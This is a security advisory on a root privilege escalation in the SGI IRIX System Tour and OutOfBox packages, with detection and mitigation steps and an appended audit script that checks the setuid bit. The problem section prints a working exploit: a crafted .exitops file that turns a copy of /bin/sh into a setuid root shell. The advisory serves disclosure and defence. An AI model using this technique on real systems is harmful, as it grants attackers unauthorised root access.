COMMAND
Systour and OutOfBox
SYSTEMS AFFECTED
IRIX 5.x, 6.0.x, 6.1, 6.2 and 6.3
PROBLEM
The Silicon Graphics Indigo Magic System Tour and OutOfBox
Experience packages are factory installed on all Silicon Graphics
Indy systems. Credit for the following text goes to Yuri Volobuev.
The purpose of these two packages, systour and OutOfBox, is to
demonstrate and highlight the features and capabilities of the
user environment and system.
Due to the disk space requirements of these subsystems, most
sites will remove these subsystems for disk space reclamation as
part of initial system setup. Those sites which have done this
will not be vulnerable.
On systems where the subsystems are still installed, both
subsystems provide setuid root programs that run in the background
to remove the subsystem when a user decides to remove the software.
This removal is done using the standard IRIX /usr/sbin/inst
program that manages IRIX software.
Provided with the right environment, the inst program could be
manipulated to execute arbitrary commands with root privileges.
An account on the vulnerable system is required for exploit.
With an account, these vulnerabilities are exploitable by both
local and remote access. And here comes the exploit.
First, we set up an environment for running inst. dryrun is set
to true because we are considerate environmentalists.
$ rbase=$HOME; export rbase
$ mkdir -p $HOME/var/inst
$ echo "dryrun: true" > $HOME/.swmgrrc
These three lines should be very familiar to all exploiters.
$ cp -p /bin/sh /tmp/foobar
$ printf '#\!/bin/sh\nchmod 4777 /tmp/foobar\n' > $HOME/var/inst/.exitops
$ chmod a+x $HOME/var/inst/.exitops
Now run it.
$ /usr/lib/tour/bin/RemoveSystemTour
Executing outstanding exit-commands from previous session ..
Successfully completed exit-commands from previous session.
Reading installation history
Checking dependencies
ERROR : Software Manager: automatic installation failed: New
target (nothing installed) and no distribution.
SOLUTION
There are no patches for these issues. However, using the
information below, steps can be taken to eliminate the exposure.
To determine if the OutOfBox and systour subsystems are installed
on a particular system, the following command can be used:
% versions OutOfBox.sw systour.sw
I = Installed, R = Removed

      Name                   Date      Description

   I  OutOfBox               11/05/96  OutOfBox Experience, 1.1
   I  OutOfBox.sw            11/05/96  OutOfBox Experience Software, 1.1
   I  OutOfBox.sw.complete   11/05/96  Complete OutOfBox Experience
   I  OutOfBox.sw.intro      11/05/96  OutOfBox Intro Movies
   I  systour                02/12/96  Indigo Magic System Tour, 5.2
   I  systour.sw             02/12/96  System Tour Execution Environment
   I  systour.sw.eoe         02/12/96  System Tour Execution Environment
In the above case, the subsystems of concern are installed and
the steps below should be performed. If no output is returned by
the command, the subsystems are not installed and no further
action is required.
*** IRIX 5.x, 6.0, 6.0.1, 6.1, 6.2 ***
The steps below can be used to remove the vulnerability by either
changing the program permissions (use step 2a) or by removing the
subsystems (use step 2b).
1) Become the root user on the system.
% /bin/su -
Password:
#
2) Choose either step 2a or 2b depending on which has the desired
result.
2a) Change the setuid root permissions on the programs of
concern.
# /bin/chmod u-s /usr/lib/tour/bin/RemoveSystemTour
# /bin/chmod u-s /usr/people/tour/oob/bin/oobversions
Removing the setuid root permissions from these tools will
prevent non-root users from removing the subsystems. Removal of
the subsystems will only be possible if the systour or OutOfBox
user is a root user or if the inst IRIX software manager is used
by root for removal.
2b) Remove the vulnerable subsystems.
# /usr/sbin/versions -v remove systour OutOfBox
3) Return to previous level.
# exit
$
*** IRIX 6.3 ***
The IRIX operating system version 6.3 does not have the System
Tour subsystem but does have the OutOfBox Experience subsystem.
The steps below can be used to remove the vulnerability by either
changing the program permissions (use step 2a) or by removing the
subsystems (use step 2b).
1) Become the root user on the system.
% /bin/su -
Password:
#
2) Choose either step 2a or 2b depending on which has the desired
result.
2a) Change the setuid root permissions on the program of concern.
# /bin/chmod u-s /usr/people/tour/oob/bin/oobversions
Removing the setuid root permissions from this program will
prevent non-root users from removing the subsystem. Removal of
the subsystem will only be possible if the OutOfBox user is a
root user or if the inst IRIX software manager is used by root
for removal.
2b) Remove the vulnerable subsystem.
# /usr/sbin/versions -v remove OutOfBox
3) Return to previous level.
# exit
$
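As an added check that is not part of the advisory, the POSIX sh script below audits the two setuid root removal tools named in step 2a of both procedures above (the IRIX 5.x/6.2 one and the IRIX 6.3 one) and reports whether each is absent, present without the setuid bit, or still exposed. The paths are the advisory's; the function names and exit codes are my own convention, and the `[ -u ]` test is the portable way to read the set-user-ID bit.

```shell
#!/bin/sh
# Added audit helper for the systour/OutOfBox exposure (not from the advisory).
# Usage: sh audit_tour_setuid.sh [path ...]   (defaults to the two advisory paths)

# Setuid root tools shipped by the two subsystems, as listed in the advisory.
DEFAULT_TOOLS="/usr/lib/tour/bin/RemoveSystemTour /usr/people/tour/oob/bin/oobversions"

# check_tool PATH
# Prints one status line and returns:
#   0 = file absent (subsystem removed, nothing to do)
#   1 = file present without the setuid bit (step 2a already applied)
#   2 = file present and setuid (exposed; apply step 2a or 2b)
check_tool() {
    path=$1
    if [ ! -e "$path" ]; then
        echo "absent   $path"
        return 0
    fi
    if [ -u "$path" ]; then
        echo "EXPOSED  $path is setuid; apply step 2a (chmod u-s) or 2b (remove subsystem)"
        return 2
    fi
    echo "ok       $path is present without the setuid bit"
    return 1
}

# audit_tools PATH...
# Checks every path; returns 2 if any tool is still setuid, otherwise 0.
audit_tools() {
    worst=0
    for p in "$@"; do
        rc=0
        check_tool "$p" || rc=$?
        if [ "$rc" -eq 2 ]; then
            worst=2
        fi
    done
    return $worst
}

if [ $# -gt 0 ]; then
    audit_tools "$@"
else
    audit_tools $DEFAULT_TOOLS
fi
```

A non-zero exit status from the script therefore means at least one of the tools still needs step 2a or 2b.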